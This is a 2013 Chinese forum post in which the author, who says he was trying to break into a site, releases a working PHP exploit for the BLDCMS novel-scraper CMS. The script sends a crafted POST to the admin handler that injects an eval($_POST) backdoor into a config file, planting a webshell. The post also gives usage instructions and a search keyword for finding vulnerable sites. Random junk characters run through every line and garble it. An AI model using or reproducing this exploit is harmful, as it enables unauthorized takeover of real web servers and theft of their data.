之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
: X j2 ?" t6 Y# Q9 x% ~* f9 u4 Z& ?. b0 W$ n) ^
* ~) u5 K" ~6 O3 M话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
& ^7 l: q8 I- h+ z! Z5 d2 D/ L # L& B0 C3 k0 X
既然都有人发了 我就把我之前写好的EXP放出来吧- B& V# Q- k: w7 t
5 k7 C/ r! U+ k6 w7 n) M
view source print?01.php;">2 a1 i2 f2 s$ V4 U- d; o
02.<!--?php. e! n) u6 i* b, i- ]( @; a3 l
03.echo "-------------------------------------------------------------------' H& {# A q) s( j7 s
04.
& p- v, I) ?, ] g( F. g05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP6 g6 c5 R, t `9 v9 E5 i7 Q2 l5 b. p
06.
$ G) }* p: _2 q) T! M$ y* S07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
2 q: a9 \$ x1 J08.
$ N9 S9 d7 w, E0 f! h9 H' Y1 V9 a; v09.QQ:981009941\r\n 2013.3.21\r\n . G5 I' K# N- ~* g
10. . W) ?" P- m: m4 K+ w) Q5 Q. {' k
11. $ h/ E7 j( }* C O! D
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
& l" w% a2 |( e! {; z13. 6 U5 q, q$ m9 B! y9 A- ]$ t" a4 d
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
( S' w1 ` X1 d! r# w9 g$ j15. , s0 }/ S2 K" s. `" G2 _, {
16.--------------------------------------------------------------------\r\n";6 {6 x- L3 \* b5 u3 g2 y; R
17.$url=$argv[1];+ B6 n/ } F% x: [+ u) V- y: u$ S5 K, V
18.$dir=$argv[2];
) U, ?) E' l5 f1 Q19.$pass=$argv[3]; K+ Q' f, e! R" F0 B2 h9 I+ E- A
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
& u9 \% ~% R4 {: P# [% I8 m21.if (emptyempty($pass)||emptyempty($url))
% O7 t' z: ?0 w: W22.{exit("请输入参数");}3 ~6 g4 W( {* L' }
23.else
. d: V1 ]4 h' g1 J- N24.{ I0 @ G7 k5 D" n: f5 q. U! j9 L
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
5 n6 `! q' O! W26. ! j. }3 e8 J' b* y
27.al;
& k. L3 S Y) J w |% l' g& J28.$length = strlen($fuckdata);
1 h( L! n/ S3 I$ A! y. n29.function getshell($url,$pass)- b6 N! l, x3 }( ?
30.{, H0 _6 \; X; a8 N8 j" \
31.global $url,$dir,$pass,$eval,$length,$fuckdata;9 [2 _# ~! j5 ~' Q% R6 q7 Y
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";4 g' O* N0 {+ ]) o1 J! ]
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";6 }- @; H6 {+ G u
34.$header .= "User-Agent: MSIE\r\n";7 g- a- K9 w4 B+ _" W
35.$header .= "Host:".$url."\r\n";
* W* u8 o$ K0 e2 ~+ z0 M* X36.$header .= "Content-Length: ".$length."\r\n";, v7 C* }$ F7 E
37.$header .= "Connection: Close\r\n";! p6 R* p7 r: W! S; _/ _- W F3 i% V
38.$header .="\r\n";7 r) y2 ^% E5 C% n9 \
39.$header .= $fuckdata."\r\n\r\n";
* @# F2 ?- A1 x40.$fp = fsockopen($url, 80,$errno,$errstr,15);
" | c1 n: T3 W; E41.if (!$fp)) P' E1 G) S+ S% I
42.{' Q) q) @: y6 J1 C5 x
43.exit ("利用失败:请检查指定目标是否能正常打开");* H5 z' O* }' E% @& w8 B
44.}8 c, X5 t4 i [% T! _; d
45.else{ if (!fputs($fp,$header))
, Q3 {8 ^, N/ _' j2 p9 O( J46.{exit ("利用失败");}' Q7 v: `, f& v% Z
47.else) t3 F" `: P% G5 v
48.{+ Q7 U- S# A3 Q: j
49.$receive = '';$ ~" P1 R4 `2 l0 L- [ X% \3 Q" J S
50.while (!feof($fp)) {% u" d; b; C+ {0 j/ b0 ^
51.$receive .= @fgets($fp, 1000);
5 M: B. i6 S7 s# }5 P6 M% ~# ~52.}& \5 g5 v# T$ F1 n% T3 L: K
53.@fclose($fp);; M) r5 I) `4 w
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标" D. J/ M3 J% `" L0 X: Y9 Q8 \
55.
( ~- Q" A% p" [" l; J56.GPC是否=off)";
% I) H0 T8 p7 U- K) H5 g7 t57.}} Z9 X* i9 ]8 C9 U8 d' W/ P0 m
58.}
6 f) W. W- M. O5 d0 U9 B! n6 \59.}
& ^! g! \- K2 S3 }! F60.getshell($url,$pass);- R9 A$ G! {+ N6 F' [
61.?-->
* d& Y4 c( V3 z } * J7 q3 V7 l3 u5 J6 o$ u
& C1 G% r# Z+ B- f! e$ }; W6 h
; Y! M% _7 f6 bby 数据流
9 r8 b& }6 G, s9 n# U |
发表于 2013-3-26 20:49:10
收藏
支持
反对